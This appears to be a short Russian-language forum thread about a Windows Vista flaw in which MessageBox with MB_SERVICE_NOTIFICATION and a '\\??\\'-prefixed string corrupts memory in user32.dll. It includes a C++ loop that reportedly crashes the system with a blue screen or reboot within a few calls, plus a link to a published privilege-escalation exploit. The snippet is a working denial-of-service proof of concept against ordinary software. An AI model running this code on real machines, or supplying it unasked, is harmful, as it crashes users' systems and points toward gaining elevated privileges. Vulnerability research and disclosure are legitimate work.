![]() |
Windows Vista Уязвимости
При наличии флага MB_SERVICE_NOTIFICATION и строки, начинающейся с "\\??\\" user32.dll жёстко портит память.
Код:
char bug [] = "\\??\\C:\\"; for(int i = 0; i < 10; i ++) { ::MessageBox(0, bug, bug, MB_SERVICE_NOTIFICATION); } На 2-4 итерации - синий экран или ребут |
Я вам, товарищ, в сотый раз талдычу:
- Мы не разыгрываем здесь самаритян! Рекомендую удалить вам эту фичу. Ведь это, парень, форменный баян! |
http://www.milw0rm.com/exploits/3071
Microsoft Vista (NtRaiseHardError) Privilege Escalation Exploit |
| Время: 22:52 |